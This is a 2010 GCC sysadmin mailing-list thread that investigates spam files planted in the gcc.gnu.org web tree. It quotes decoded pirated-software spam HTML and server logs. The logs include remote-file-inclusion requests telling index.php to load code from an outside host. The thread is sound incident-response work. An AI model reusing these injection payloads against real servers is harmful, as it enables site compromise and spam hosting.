htdig/.cache directory

htdig/.cache directory

[Joseph S. Myers]

The latest gccadmin update_web_docs_svn cron job resulted in a large 
number of errors of the form:

rm: cannot remove `./htdig/.cache/.%2E8F%0A8A%ECC8%9BC5%EF7A%2C8B': Permission denied

http://gcc.gnu.org/ml/gccadmin/2010-q1/msg00150.html

Has something changed just now to create this directory 
(/www/gcc/htdocs/htdig/.cache), or to make it non-writable to gccadmin?  
If this directory is indeed meant to be there, then the relevant script 
(wwwdocs/bin/preprocess) probably needs to be taught to ignore it rather 
than trying to remove files from it.

-- 
Joseph S. Myers
joseph@codesourcery.com

Re: htdig/.cache directory

[Joseph S. Myers]

In IRC discussion, we (fche and I) concluded that the files should not be 
there, and the problem was that something (unidentified) had created them; 
there are more such .cache directories elsewhere on the system, that also 
should not be there, some created on Feb 26.  We haven't worked out what 
created the files.

-- 
Joseph S. Myers
joseph@codesourcery.com

Re: htdig/.cache directory

[Frank Ch. Eigler]

Hi -

> [...] We haven't worked out what created the files.

Eww, base-64-decoded some random one of the /.cache/.%DEADBEEF files:

<!--/shop/item/325/-->
<html>
<head>
<title>download windows 7 via ftp CLICK HERE! DOWNLOAD Microsoft Windows 7 Ultimate (64 bit)! NEW SOFTWARE!</title>
<meta name="description" content="Download Windows 7 Via Ftp. The same situation exists with MP3 arguably the most popular format for audio (notably audio you rip from your CD collection). ">
<meta name="keywords" content="download windows 7 via ftp,download windows 7 via ftp,download windows 7 via ftp">
<meta name="author" content="Jason Molenda, International Man Of Mystery">
</head>
<body bgcolor="white" text="black" link="#0000EE" VLINK="#551A8B" ALINK="red">
<table align="left" border="1" cellspacing="0" cellpadding="8" width="20%">
 <td bgcolor="#eeeeee" valign="top">
  <table bgcolor="#eeeeee" border="0" cellspacing="0" cellpadding="3" width="100%">
   <tr><td colspan="2"><p></td></tr>
   <tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/6074/download/cheap-cs4.html" title="cheap cs4">Cheap Cs4</a></td></tr>
   <tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/1213/download/buy-after-effects.html" title="buy after effects">Buy After Effects</a></td></tr>
   <tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/4092/download/buy-frontpage.html" title="buy frontpage">Buy Frontpage</a></td></tr>
   <tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/3282/download/xp-for-sale.html" title="xp for sale">Xp For Sale</a></td></tr>

....

probable php exploit, was Re: htdig/.cache directory

[Frank Ch. Eigler]

Hi -

It gets better.  So someone placed /index.php files here and there,
using the .cache files as spam payload.  I saved a bunch of this in
/root/dot-cache-spam-artifacts/.


There are suspicious entries such as this in the logs:
% fgrep .cache /var/log/httpd/gcc*_log | less
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice:  Undefined index:  HTTP_A in /export/u0/sourceware/sourceware/www/gcc/
htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice:  Undefined index:  HTTP_A in /export/u0/sourceware/sourceware/www/gcc/
htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice:  Undefined index:  HTTP_A in /export/u0/sourceware/sourceware/www/gcc/
htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice:  Undefined index:  HTTP_A in /export/u0/sourceware/sourceware/www/gcc/
htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice:  Undefined index:  HTTP_A in /export/u0/sourceware/sourceware/www/gcc/

Searching for that IP address:
/var/log/httpd/cygwin-combined_log:66.249.71.244 - - [01/Mar/2010:12:28:18 +0000] "GET /cgi%20%5B...%5D%3C/b%3E%3C/td%3E%3C/span%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cspan%20class='wynikfirmy1'%20style='font:%20normal%2010px%20verdana;'%3E%20%20%20%20%20%20%20%202008-10-10%20::%20%3Ca%20class='wynikfirmy1'%20href='?oid=451&odp=1387'%3Emammamia;%20%3Ca%20href= HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" (67%)

But according to ARIN it's a real google address.


More suspicuous stuff:
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 
404 289 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET //index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404
 286 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran/2005-11//index.php?include=http://pangestu.700megs.com/columbus/heheh
.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HT
TP/1.1" 404 297 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran/2005-11/msg00424.html//index.php?include=http://pangestu.700megs.com/
columbus/heheh.txt? HTTP/1.1" 404 319 "-" "Mozilla/5.0" (-%)


I up2dated php and other stuff on sourceware; maybe it was a
vulnerability there being exploited.  Previous version was 4.3.9-3.26.
See also http://rhn.redhat.com/errata/RHSA-2010-0040.html
See also http://www.google.com/search?q=php%20Undefined%20index%20HTTP_A
for another few victims.

- FChE